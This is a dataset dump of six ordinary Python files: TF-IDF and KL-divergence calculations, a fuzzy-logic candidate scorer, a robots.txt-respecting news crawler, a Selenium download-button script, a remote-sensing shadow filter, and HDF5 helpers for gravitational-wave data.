| seq_id (string, 4-11 chars) | text (string, 113-2.92M chars) | repo_name (string, 4-125 chars, nullable) | sub_path (string, 3-214 chars) | file_name (string, 3-160 chars) | file_ext (string, 18 classes) | file_size_in_byte (int64, 113-2.92M) | program_lang (string, 1 class) | lang (string, 93 classes) | doc_type (string, 1 class) | stars (int64, 0-179k, nullable) | dataset (string, 3 classes) | pt (string, 78 classes) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
5420361638 | import pandas as pd
from math import log
from init_var import *
#-----------------------------------------------------------------------------#
all_term = []
with open('all_term.txt', 'r') as all_term_file:
for line in all_term_file:
term = line.split()[0]
all_term.append(term)
tf_matrix = [[0] * len(all_term) for _ in range(docnum)]
with open('tf_matrix.txt', 'r') as tf_matrix_file:
i = -1
for row in tf_matrix_file:
i += 1
row = row.split()
for j in range(len(row)):
ele = row[j]
tf_matrix[i][j] = int(ele)
df_matrix = [0] * len(all_term)
def calcDF():
# df: num of docs containing the term 't'
# return a 1d array
for col in range(len(tf_matrix[0])):
for row in range(len(tf_matrix)):
if tf_matrix[row][col] == 0:
pass
else:
df_matrix[col] += 1
print('Calculating df_matrix ...')
calcDF()
with open('df_matrix.txt', 'w') as df_matrix_file:
print(*df_matrix, sep='\n', file=df_matrix_file)
tf_idf_matrix = [[0] * len(all_term) for _ in range(docnum)]
def calcTFIDF():
# tf: term frequency - inverse document frequency
# return a 2d array
for row in range(len(tf_idf_matrix)):
for col in range(len(tf_idf_matrix[0])):
tf_idf_matrix[row][col] = round(tf_matrix[row][col] * log(docnum / df_matrix[col]), 3)
print('Calculating tfidf_matrix ...')
calcTFIDF()
with open('tf_idf_matrix.txt', 'w') as tf_idf_matrix_file:
for row in tf_idf_matrix:
print(*row, sep=' ', file=tf_idf_matrix_file)
def calcKLD(vec1, vec2):
# kld: KL divergence
kld = 0
for i in range(len(vec1)):
if vec1[i]==0 or vec2[i]==0:
pass
else:
kld += vec1[i] * log(vec1[i] / vec2[i])
return kld
kld_matrix = [[0] * docnum for _ in range(docnum)]
akld_matrix = [[0] * docnum for _ in range(docnum)]
def calcAKLD():
# akld: average KL divergence
for row in range(docnum):
for col in range(docnum):
kld_matrix[row][col] = calcKLD(tf_idf_matrix[row], tf_idf_matrix[col])
for row in range(docnum):
for col in range(docnum):
akld_matrix[row][col] = round(1/2 * (kld_matrix[row][col] + kld_matrix[col][row]), 3)
print('Calculating akld_matrix ...')
calcAKLD()
with open('akld_matrix.txt', 'w') as akld_matrix_file:
for row in akld_matrix:
print(*row, sep=' ', file=akld_matrix_file)
| Hansimov/info-theory-proj | proj-1/calc_tfidf.py | calc_tfidf.py | py | 2,481 | python | en | code | 0 | github-code | 36 |
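The nested loops above make the cost explicit but are slow for large vocabularies; a minimal NumPy sketch of the same average (symmetric) KL computation, with illustrative names not taken from the repo, would look like this:

```python
import numpy as np

def average_kl_matrix(tfidf):
    """Average KL divergence between every pair of row vectors.

    Mirrors calcKLD/calcAKLD above: terms where either vector is zero are skipped.
    """
    n = tfidf.shape[0]
    kld = np.zeros((n, n))
    for i in range(n):
        for j in range(n):
            p, q = tfidf[i], tfidf[j]
            mask = (p > 0) & (q > 0)       # skip zero terms, as in calcKLD
            kld[i, j] = np.sum(p[mask] * np.log(p[mask] / q[mask]))
    return 0.5 * (kld + kld.T)             # akld[i][j] = (kld[i][j] + kld[j][i]) / 2

# Tiny example: three documents over a four-term vocabulary
docs = np.array([[1.0, 2.0, 0.0, 1.0],
                 [2.0, 1.0, 1.0, 0.0],
                 [1.0, 1.0, 1.0, 1.0]])
print(np.round(average_kl_matrix(docs), 3))
```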
35197943498 | import sys
import IPython
import numpy as np
import pprint as pp
from IPython.display import display
import sklearn
import matplotlib.pyplot as plt
from MembershipFunc import MemberFunc
# import Membership
class FuzzyLogic(object):
"""docstring for FuzzyLogic."""
def __init__(self, data2tes):
super(FuzzyLogic, self).__init__()
self.allrule = [];
self.endResult = {};
self.MemberFunc = MemberFunc()
self.academy = data2tes[0]
self.relevancy = data2tes[1]
self.interview = data2tes[2]
self.fuzzyFucation()
def findMew(self,x,data):
res = 0;
if x <= data[0] or x >= data[3]:
res = 0
if data[0] <= x <= data[1]:
res = (x-data[0]) / (data[1]-data[0])
if data[1] <= x <= data[2]:
res = 1
if data[2] <= x <= data[3]:
res = (data[3]-x) / (data[3]-data[2])
return float("{0:.2f}".format(res))
def fuzzyFucation(self):
self.acad_data = {'high': [3.0,3.0,3.3,3.5], 'vhigh': [3.3,3.5,4.0,4.0]}
self.rele_data = {'low': [0,0,2,5], 'medium': [2,5,5,8], 'high': [5,8,10,10]}
self.inte_data = {'low': [0,0,2,5], 'medium': [2,5,5,8], 'high': [5,8,10,10]}
self.cand_data = {'least': [0,0,2,4], 'less': [2,4,4,6], 'prefer': [4,6,6,8], 'most': [6,8,10,10]}
self.acad_range = np.arange(3, 4, 0.1)
self.rele_range = np.arange(0, 11, 1)
self.inte_range = np.arange(0, 11, 1)
self.cand_range = np.arange(0, 11, 1)
self.mew_akademik = {'mhigh':self.findMew(self.academy,self.acad_data['high']),'mvhigh':self.findMew(self.academy,self.acad_data['vhigh'])}
self.mew_relevansi = {'low':self.findMew(self.relevancy,self.rele_data['low']),'medium':self.findMew(self.relevancy,self.rele_data['medium']),'high':self.findMew(self.relevancy,self.rele_data['high'])}
self.mew_interview = {'low':self.findMew(self.interview,self.inte_data['low']),'medium':self.findMew(self.interview,self.inte_data['medium']),'high':self.findMew(self.interview,self.inte_data['high'])}
def newRule(self,ismin,candidate):
tomin = min(ismin)
resbawah = []
if candidate[0] == candidate[1]:
for x in range(0,11):
resbawah.append(self.MemberFunc.leftTrapezoid(x,tomin,candidate))
if candidate[1] == candidate[2]:
for x in range(0,11):
resbawah.append(self.MemberFunc.centerTriangular(x,tomin,candidate))
if candidate[2] == candidate[3]:
for x in range(0,11):
resbawah.append(self.MemberFunc.rightTrapezoid(x,tomin,candidate))
self.allrule.append(resbawah)
def addRule(self):
rule1 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['low'],self.mew_interview['low']],self.cand_data['least'])
rule2 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['low'],self.mew_interview['medium']],self.cand_data['least'])
rule3 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['low'],self.mew_interview['high']],self.cand_data['less'])
rule4 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['medium'],self.mew_interview['low']],self.cand_data['least'])
rule5 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['medium'],self.mew_interview['medium']],self.cand_data['less'])
rule6 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['medium'],self.mew_interview['high']],self.cand_data['prefer'])
rule7 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['high'],self.mew_interview['low']],self.cand_data['less'])
rule8 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['high'],self.mew_interview['medium']],self.cand_data['prefer'])
rule9 = self.newRule([self.mew_akademik['mhigh'],self.mew_relevansi['high'],self.mew_interview['high']],self.cand_data['prefer'])
# pp.pprint(allrule)
rule10 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['low']],self.cand_data['less'])
rule11 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['low']],self.cand_data['less'])
rule12 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['medium']],self.cand_data['prefer'])
rule13 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['low'],self.mew_interview['high']],self.cand_data['less'])
rule14 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['medium'],self.mew_interview['low']],self.cand_data['prefer'])
rule15 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['medium'],self.mew_interview['medium']],self.cand_data['most'])
rule16 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['medium'],self.mew_interview['high']],self.cand_data['prefer'])
rule17 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['high'],self.mew_interview['low']],self.cand_data['most'])
rule18 = self.newRule([self.mew_akademik['mvhigh'],self.mew_relevansi['high'],self.mew_interview['medium']],self.cand_data['most'])
def doCompute(self):
bawahPerRule = np.array(self.allrule)
# pp.pprint(bawahPerRule)
agregasi = bawahPerRule.max(axis=0)
# pp.pprint(agregasi)
defuz = 0
atas = 0
for i in range (0,11):
atas = atas + (i*agregasi[i])
defuz = atas / np.sum(agregasi)
self.endResult['pembilang'] = atas
self.endResult['penyebut'] = np.sum(agregasi)
self.endResult['hasil'] = defuz
def show(self):
print()
print("=== Proses Mew Tiap Inputan ===")
print("Academi:"+str(self.academy)+" | Relevancy:"+str(self.relevancy)+" | Interview:"+str(self.interview))
print()
print("=== Proses Mew Tiap Inputan ===")
# pp.pprint(self.allrule)
pp.pprint(self.mew_akademik)
pp.pprint(self.mew_relevansi)
pp.pprint(self.mew_interview)
print()
print("=== Proses Perhitungan Rule Dan Penentuan Agregasi ===")
# pp.pprint(bawahPerRule)
# pp.pprint(agregasi)
print() # not sure yet what should be displayed here
print("=== Proses Hasil Akhir ===")
pp.pprint(self.endResult)
print()
myFuzzy = FuzzyLogic([3.1,8,9])
myFuzzy.addRule()
myFuzzy.doCompute()
myFuzzy.show()
| fianekame/ComputationalIteligence | Fuzzy/Manual/main.py | main.py | py | 6,526 | python | en | code | 0 | github-code | 36 |
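findMew above is a standard trapezoidal membership function and doCompute is a discrete centroid defuzzification; a self-contained sketch of those two pieces, with made-up parameter values, is:

```python
import numpy as np

def trapezoid(x, a, b, c, d):
    """Trapezoidal membership: 0 outside [a, d], 1 on [b, c], linear ramps in between."""
    if x <= a or x >= d:
        return 0.0
    if b <= x <= c:
        return 1.0
    if x < b:
        return (x - a) / (b - a)
    return (d - x) / (d - c)

def centroid(universe, memberships):
    """Discrete centroid defuzzification: sum(x * mu(x)) / sum(mu(x))."""
    memberships = np.asarray(memberships, dtype=float)
    return float(np.dot(universe, memberships) / memberships.sum())

universe = np.arange(0, 11)                         # 0..10, like cand_range above
mu = [trapezoid(x, 4, 6, 6, 8) for x in universe]   # the 'prefer' candidate set [4,6,6,8]
print(round(centroid(universe, mu), 2))             # -> 6.0
```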
32316213655 | import time
import threading
import logging
import traceback
import datetime
import os
import sys
import re
import robotparser as rp
import numpy as np
import random
import util
import decide
import queries
from conn import connect
class Crawler:
'''
Abstract class for crawling a news source.
'''
########################
# #
# Abstract functions #
# #
########################
def sleep(self):
'''
Abstract function for waiting between requests.
Can add additional functionality, such as random sleep times.
'''
return NotImplemented
def is_article(self, url):
'''
Abstract function for determining if a url is an article or not.
Returns True if the url is an article, false otherwise.
'''
return NotImplemented
def extract_date_from_url(self, url):
'''
Abstract function for parsing a date from a url.
Currently crawler only works for sources with dates in their urls.
Takes a url as a string, returns a datetime.date object.
'''
return NotImplemented
############################
# #
# Non-Abstract functions #
# #
############################
def __init__(self, base_url_string):
'''
Not abstract.
Parameters:
base_url_string, a string representing the base url for a source (eg, foxnews.com)
article_regex, a string representing a regex which only matches for articles
'''
self.base_url_string = base_url_string
self.initialize_robots()
def initialize_robots(self):
'''
Not abstract.
Initializes a robot parser for the crawler.
Use self.robot_parser.can_fetch("*", url) to decide if allowed or not.
'''
base_url_string = self.base_url_string
robot_url = util.robots_url(base_url_string)
robot_parser = rp.RobotFileParser()
robot_parser.set_url(robot_url)
robot_parser.read()
self.robot_parser = robot_parser
def decide_next_visit(self, conn, crawl_id, bad_urls):
'''
Not abstract.
Decides which url to visit next.
Returns a dictionary visit_url with two keys
visit_url['id'] - database if of the url to visit
visit_url['url'] - string representation of the url to visit
Returns None if no urls left to visit.
Strategy is to visit anything not visited this crawl, with the following priority:
1) base url
2) internal pages linked from the base url
3) articles which haven't been visited yet, sorted by date
All three strategies are implemented below.
'''
base_url_string = self.base_url_string
# strategy 1 - visit base url if not visited yet (ignore previous crawls)
base_url_id = queries.insert_url(conn, base_url_string)
base_url = {'id': base_url_id, 'url': base_url_string}
visited_base = decide.visited_base_url(conn, crawl_id)
if not visited_base:
return base_url
# strategy 2 - visit any urls linked by the base url that haven't been visited yet (ignore previous crawls)
urls = decide.find_unvisited_links_from_base(conn, crawl_id, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
if len(urls) > 0:
visit_url = random.choice(urls)
return visit_url
# strategy 3 - visit any articles not visited yet (including previous crawls), starting with the most recent
urls = decide.find_unvisited_internal_urls(conn, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
urls = filter(lambda url: self.is_article(url['url']), urls)
if len(urls) > 0:
dates = map(lambda url: self.extract_date_from_url(url['url']), urls)
reverse_sorted_dates = np.argsort(np.array(dates))[::-1]
last_date_index = reverse_sorted_dates[0]
visit_url = urls[last_date_index]
return visit_url
return None
def crawl(self):
'''
Not abstract. Begins a crawl.
Crawls until MAX_VISITS is reached, unless:
- self.decide_next_visit(conn) returns None
- Five exceptions in a row
'''
# initialize variables
visits = 0
MAX_VISITS = 1000 # so we don't just keep crawling forever
bad_urls = set() # when a url doesn't work, add url_id to bad_urls, ignore in future
error_count = 0
base_url_string = self.base_url_string
conn = connect()
# initialize logging
initialize_logging(base_url_string)
start_time = time.time()
logging.info('STARTING CRAWL AT TIME: {0}'.format(util.time_string(start_time)))
# initlialize database for this crawl
base_url_id = queries.insert_url(conn, base_url_string)
source_id = queries.insert_source(conn, base_url_string)
crawl_id = queries.insert_crawl(conn, base_url_string)
while True:
if error_count == 5:
logging.error('Too many exceptions in a row, exiting.')
break
visit_url = self.decide_next_visit(conn, crawl_id, bad_urls)
if visit_url is None:
logging.info('Finished crawling, no more urls to visit.')
break
try:
logging.info('Visiting {}'.format(visit_url['url']))
self.visit(conn, crawl_id, source_id, visit_url)
error_count = 0
except Exception as e:
logging.error('Error when downloading {0}'.format(visit_url['url']))
logging.error(traceback.format_exc())
bad_urls.add(visit_url['id'])
error_count += 1
visits += 1
if visits == MAX_VISITS:
logging.info('Finished crawling, reached max visits of {}'.format(MAX_VISITS))
break
self.sleep()
def visit(self, conn, crawl_id, source_id, visit_url):
'''
Not abstract. Visits a url during a crawl.
Inserts all relevant information to the database for a single visit.
Inserts article information if the url matches the article regex.
'''
visit_url_id = visit_url['id']
visit_url_string = visit_url['url']
base_url_string = self.base_url_string
html = util.download_html(visit_url_string)
found_links = util.extract_links(html, base_url_string)
visit_id = queries.insert_visit(conn, crawl_id, visit_url_id)
new_url_ids = queries.insert_urls(conn, found_links)
queries.insert_links(conn, visit_id, new_url_ids)
if self.is_article(visit_url_string):
article = util.extract_article(html, visit_url_string)
article_title = article.title
article_text = article.text
article_date = self.extract_date_from_url(visit_url_string)
queries.insert_article(conn, visit_url_id, article_title, article_text, article_date, source_id)
def initialize_logging(base_url):
log_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'logs')
if not os.path.exists(log_dir):
os.makedirs(log_dir)
source_str = util.extract_source(base_url)
log_filename = 'LOG_{0}.log'.format(source_str)
log_path = os.path.join(log_dir, log_filename)
logging.basicConfig(filename=log_path, filemode='a', level=logging.INFO)
stderrLogger=logging.StreamHandler()
stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logging.getLogger().addHandler(stderrLogger)
sys.excepthook = log_unchecked_exception
def log_unchecked_exception(exctype, value, tb):
traceback.print_tb(tb)
log_str = '''
UNCHECKED EXCEPTION
Type: {}
Value: {}
Traceback: {}'''.format(exctype, value, traceback.print_tb(tb))
logging.error(log_str)
| bentruitt/TopicStory | topicstory/crawler/crawler.py | crawler.py | py | 8,339 | python | en | code | 0 | github-code | 36 |
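The `import robotparser as rp` above is the Python 2 module name; under Python 3 the same robots.txt check looks like this (URLs below are placeholders, not from the project):

```python
from urllib import robotparser  # Python 3 location of the robots.txt parser

robots = robotparser.RobotFileParser()
robots.set_url("https://example.com/robots.txt")
robots.read()

for url in ("https://example.com/news/2024/01/story.html", "https://example.com/admin/"):
    print(url, "->", "allowed" if robots.can_fetch("*", url) else "blocked")
```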
71399122025 |
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
import time
driver = webdriver.Firefox()
driver.get('https://github.com/Vidoosh/Image-colorizer')
time.sleep(2)
code = driver.find_element(By.CSS_SELECTOR, '#repo-content-pjax-container > div > div > div.Layout.Layout--flowRow-until-md.Layout--sidebarPosition-end.Layout--sidebarPosition-flowRow-end > div.Layout-main > div.file-navigation.mb-3.d-flex.flex-items-start > span.d-none.d-md-flex.ml-2 > get-repo > feature-callout')
code.click()
time.sleep(1)
try:
download = driver.find_element(By.CSS_SELECTOR, '#local-panel > ul > li:nth-child(3) > a')
download.click()
print("Download initiated successfully")
except NoSuchElementException as e:
print("Download button not found")
finally:
driver.quit()
| sravanithummapudi/st | download_button.py | download_button.py | py | 901 | python | en | code | 0 | github-code | 36 |
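The fixed `time.sleep` calls above can race the page load; an explicit wait is the usual alternative. A sketch with an illustrative selector rather than the exact one used above:

```python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Firefox()
try:
    driver.get('https://github.com/Vidoosh/Image-colorizer')
    # Wait up to 10 s for the element to become clickable instead of sleeping a fixed time.
    button = WebDriverWait(driver, 10).until(
        EC.element_to_be_clickable((By.CSS_SELECTOR, 'get-repo summary'))  # illustrative selector
    )
    button.click()
finally:
    driver.quit()
```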
11876743553 | # Data preprocessing: shadow filtering
# yangzhen
# 2020.4.13
# translated from MATLAB
"""Get the shadow proportion from remote sensing images."""
import numpy as np
import cv2
import os
import json
from shutil import copyfile
import argparse
def cv_imread(file_path):
cv_img=cv2.imdecode(np.fromfile(file_path,dtype=np.uint8),1)
return cv_img
def cv_imwrite(filepath,img):
cv2.imencode(".png",img)[1].tofile(filepath)
def standard(data):
'''Normalize an image band.
Input: single-channel image
Output: normalized single-channel image'''
mdata = data.copy()
irow, icol = mdata.shape[0:2]
mdata = np.reshape(mdata, [irow*icol, 1])
temp1 = mdata - np.min(data)
result = temp1/(np.max(data)-np.min(data))
result = np.reshape(result, [irow, icol])
np.seterr(divide='ignore', invalid='ignore')
return result
def GetLight(img):
'''Compute perceptual (human-vision) luminance.'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = 0.04*R+0.5*G+0.46*B
return result
def GetColor(img):
'''Normalize the chromaticity space.'''
mimg = img.copy()
misc = mimg[:,:,0]+mimg[:,:,1]+mimg[:,:,2]
misc[misc == 0] = 0.0000001
mimg[:,:,0] = img[:,:,0]/misc
mimg[:,:,1] = img[:,:,1]/misc
result = np.abs(mimg - img)
result = (result[:,:,0]+result[:,:,1])/2
return result
def GetVege(img):
'''Extract the vegetation feature.'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = G-np.minimum(R, B)
result[result<0] = 0
return result
def GetLDV(idist, ilight, ivege):
'''Combine the cues into the final decision map.'''
idist = standard(idist)
ilight = standard(ilight)
ivege = standard(ivege)
result = idist-ilight-ivege
result[result<0]=0
return result
def FinalTrare(img):
'''Post-process the result.'''
mimg = img.copy()
mimg = np.uint8(standard(mimg)*255)
T, result = cv2.threshold(mimg, 0, 255, cv2.THRESH_OTSU)
result = cv2.medianBlur(result, 7)
return result
def ShadowsProportion(path:{}):
"""
Shadow extraction
@param path: dict
@path[0] folder of input images to check for shadows
@path[1] output folder for images whose shadow proportion is below the threshold
@path[2] shadow proportion threshold
ps: when the images are too large they are processed in tiles
"""
File_in = path[0]
File_out = path[1]
T = path[2]
mpath = path[3]
File_out2=path[4]
if not os.path.exists(File_out):
os.makedirs(File_out)
if not os.path.exists(File_out2):
os.makedirs(File_out2)
# start detection
namelist=[]
for filename in os.listdir(File_in):
if not filename.find('.png') == -1:
namelist.append(filename)
n = len(namelist)
fid = open('ShadowsProportion.txt', 'w')
for i in range(n):
filenamein = os.path.join(File_in, namelist[i])
img = cv_imread(filenamein)
# extract the shadow
img1 = img.astype(np.float64)  # np.float alias was removed in NumPy 1.24
img1[:,:,0] = standard(img[:,:,0])
img1[:,:,1] = standard(img[:,:,1])
img1[:,:,2] = standard(img[:,:,2])
idist = GetColor(img1)
ilight = GetLight(img1)
ivege = GetVege(img1)
final = GetLDV(idist, ilight, ivege)
shadow = FinalTrare(final)
shadow = shadow/255
# compute the shadow proportion and save it
S = shadow.size
s = np.sum(sum(shadow))
iratio = s/S
fid.write(namelist[i] + ',' + str('%.3f' % iratio) + '\n')
# save images whose shadow proportion is below the threshold
filenameout = os.path.join(File_out, namelist[i])
filenameout2 = os.path.join(File_out2, namelist[i])
mapout = mpath.replace('rawdata','noshade')
if not os.path.exists(mapout):
os.makedirs(mapout)
if iratio < T:
cv_imwrite(filenameout, img)
copyfile(os.path.join(mpath,namelist[i]),(os.path.join(mapout,namelist[i])))
else :
cv_imwrite(filenameout2, img)
fid.close()
def takejson(getjson):
json1 = json.loads(getjson)
path = {}
path[0] = json1['rpath']
path[1] = path[0].replace('rawdata','noshade')
path[2] = json1['shadowProportion']
path[3]=json1['mpath']
path[4]=path[0].replace('rawdata','withshade')
#print (path)
ShadowsProportion(path)
print ('Shadow filtering Completed')
if __name__ == "__main__":
# get the input image path, shadow proportion threshold, and output image path
# File_in = input('Please input the data file name:')
# T = float(input('Please input the threshold value:'))
# File_out = input('Please input the out-img filename:')
parser = argparse.ArgumentParser()
parser.add_argument('--input_json', type=str, help='input JSON string')
args = parser.parse_args()
# json1={'rpath':r'F:\Chicago2\metadata\谷歌影像无标注\14\14_14aligned','mpath':r'F:\Chicago2\metadata\谷歌地图无标注\14\14_14aligned','shadowProportion':0.2}
# getjson=json.dumps(json1)
takejson(args.input_json)
| jansona/GeoScripts | shadow_filter/shadowfilter.py | shadowfilter.py | py | 4,966 | python | en | code | 0 | github-code | 36 |
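The pipeline above fuses chromaticity, luminance, and vegetation cues before Otsu thresholding; a stripped-down sketch that only Otsu-thresholds the grayscale image gives a rough shadow ratio with the same cv2 calls (the file name is illustrative):

```python
import cv2
import numpy as np

def rough_shadow_ratio(path):
    """Crude shadow proportion: Otsu threshold on grayscale, dark class counted as shadow.
    A simplification of ShadowsProportion above, not the same decision function."""
    img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
    if img is None:
        raise FileNotFoundError(path)
    _, mask = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)
    return float(np.count_nonzero(mask)) / mask.size

# print(rough_shadow_ratio('tile_0001.png'))  # e.g. 0.18 -> 18 % of pixels flagged as shadow
```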
2986896269 | import os
import h5py
import numpy as np
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
if 'KAGGLE_BASE_URL' in os.environ:
challenge = 'g2net-detecting-continuous-gravitational-waves'
PATH_TO_TEST_FOLDER = os.path.join('/kaggle', 'input', challenge, 'test')
PATH_TO_TRAIN_FOLDER = os.path.join('/kaggle', 'input', challenge, 'train')
PATH_TO_LABEL_FILE = os.path.join('/kaggle', 'input', challenge, 'train_labels.csv')
PATH_TO_MODEL_FOLDER = os.path.join('/kaggle', 'input', 'models')
PATH_TO_LOG_FOLDER = os.path.join('/kaggle', 'temp', 'logs')
PATH_TO_CACHE_FOLDER = os.path.join('/kaggle', 'working', 'cache')
PATH_TO_SIGNAL_FOLDER = os.path.join('/kaggle', 'working', 'signal')
PATH_TO_NOISE_FOLDER = os.path.join('/kaggle', 'working', 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
PATH_TO_SOURCE_FOLDER = os.path.join('/kaggle', 'working', 'src')
else:
PATH_TO_TEST_FOLDER = os.path.join(os.getcwd(), 'test_data')
PATH_TO_TRAIN_FOLDER = os.path.join(os.getcwd(), 'train_data')
PATH_TO_MODEL_FOLDER = os.path.join(os.getcwd(), 'models_saved')
PATH_TO_LOG_FOLDER = os.path.join(os.getcwd(), 'logs')
PATH_TO_CACHE_FOLDER = os.path.join(os.getcwd(), 'cache')
PATH_TO_LABEL_FILE = os.path.join(os.getcwd(), 'train_labels.csv')
PATH_TO_SIGNAL_FOLDER = os.path.join(os.getcwd(), 'signal')
PATH_TO_NOISE_FOLDER = os.path.join(os.getcwd(), 'noise')
PATH_TO_DYNAMIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'dynamic')
PATH_TO_STATIC_NOISE_FOLDER = os.path.join(PATH_TO_NOISE_FOLDER, 'static')
PATH_TO_TMP_FOLDER = os.path.join(os.getcwd(), 'tmp')
PATH_TO_SOURCE_FOLDER = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))
# setup
if not os.path.isdir(PATH_TO_TRAIN_FOLDER):
os.makedirs(PATH_TO_TRAIN_FOLDER)
if not os.path.isdir(PATH_TO_TEST_FOLDER):
os.makedirs(PATH_TO_TEST_FOLDER)
if not os.path.isdir(PATH_TO_MODEL_FOLDER):
os.makedirs(PATH_TO_MODEL_FOLDER)
if not os.path.isdir(PATH_TO_LOG_FOLDER):
os.makedirs(PATH_TO_LOG_FOLDER)
if not os.path.isdir(PATH_TO_CACHE_FOLDER):
os.makedirs(PATH_TO_CACHE_FOLDER)
if not os.path.isdir(PATH_TO_NOISE_FOLDER):
os.makedirs(PATH_TO_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_SIGNAL_FOLDER):
os.makedirs(PATH_TO_SIGNAL_FOLDER)
if not os.path.isdir(PATH_TO_DYNAMIC_NOISE_FOLDER):
os.makedirs(PATH_TO_DYNAMIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_STATIC_NOISE_FOLDER):
os.makedirs(PATH_TO_STATIC_NOISE_FOLDER)
if not os.path.isdir(PATH_TO_TMP_FOLDER):
os.makedirs(PATH_TO_TMP_FOLDER)
if 'IS_CHARLIE' in os.environ:
print('We are on Charlie')
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
#os.environ["PYTORCH_CUDA_ALLOC_CONF"] = "max_split_size_mb:2000"
def print_red(*text):
print(f'{bcolors.FAIL}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_blue(*text):
print(f'{bcolors.OKCYAN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_green(*text):
print(f'{bcolors.OKGREEN}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def print_yellow(*text):
print(f'{bcolors.WARNING}{" ".join([str(t) for t in text])}{bcolors.ENDC}')
def open_hdf5_file(path_to_file):
result = {}
with h5py.File(path_to_file, 'r') as hd5_file:
base_key = list(hd5_file.keys())[0]
result['base_key'] = base_key
result['frequencies'] = np.array(hd5_file[f'{base_key}/frequency_Hz'])
result['h1'] = {}
result['l1'] = {}
result['h1']['amplitudes'] = np.array(hd5_file[f'{base_key}/H1/SFTs'])
result['l1']['amplitudes'] = np.array(hd5_file[f'{base_key}/L1/SFTs'])
result['h1']['timestamps'] = np.array(hd5_file[f'{base_key}/H1/timestamps_GPS'])
result['l1']['timestamps'] = np.array(hd5_file[f'{base_key}/L1/timestamps_GPS'])
return result
def get_df_dynamic_noise():
assert len(os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)) != 0, 'There must be data in noise folder'
return [os.path.join(PATH_TO_DYNAMIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_DYNAMIC_NOISE_FOLDER)]
def get_df_static_noise():
assert len(os.listdir(PATH_TO_STATIC_NOISE_FOLDER)) != 0, 'There must be data in static_noise folder'
return [os.path.join(PATH_TO_STATIC_NOISE_FOLDER, p) for p in os.listdir(PATH_TO_STATIC_NOISE_FOLDER)]
def get_df_signal():
assert len(os.listdir(PATH_TO_SIGNAL_FOLDER)) != 0, 'There must be data in signal folder'
all_files = [os.path.join(PATH_TO_SIGNAL_FOLDER, p) for p in os.listdir(PATH_TO_SIGNAL_FOLDER)]
all_files = sorted(all_files)
offset = len(all_files) // 2
return [(all_files[i], all_files[i+offset]) for i in range(offset)]
def normalize_image(img):
img += abs(np.min(img))
img /= np.max(img)
img *= 255
return img
if __name__ == '__main__':
print_red('This', 'text', 'is red', 1, 23)
print_blue('This', 'text', 'is blue', 1, 23)
print_green('This', 'text', 'is green', 1, 23)
print_yellow('This', 'text', 'is yellow', 1, 23)
| felix-20/gravitational_oceans | src/helper/utils.py | utils.py | py | 5,376 | python | en | code | 1 | github-code | 36 |
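A small, self-contained sketch of the HDF5 layout that `open_hdf5_file` above expects; the group names follow that function and all values are synthetic:

```python
import h5py
import numpy as np

# Write a toy file in the expected layout ...
with h5py.File('toy_sample.hdf5', 'w') as f:
    g = f.create_group('toy_id')
    g.create_dataset('frequency_Hz', data=np.linspace(100.0, 100.1, 360))
    for det in ('H1', 'L1'):
        d = g.create_group(det)
        sft = np.random.randn(360, 16) + 1j * np.random.randn(360, 16)
        d.create_dataset('SFTs', data=sft.astype(np.complex64))
        d.create_dataset('timestamps_GPS', data=np.arange(16) * 1800)

# ... and read it back the same way the helper does.
with h5py.File('toy_sample.hdf5', 'r') as f:
    base_key = list(f.keys())[0]
    amplitudes = np.array(f[f'{base_key}/H1/SFTs'])
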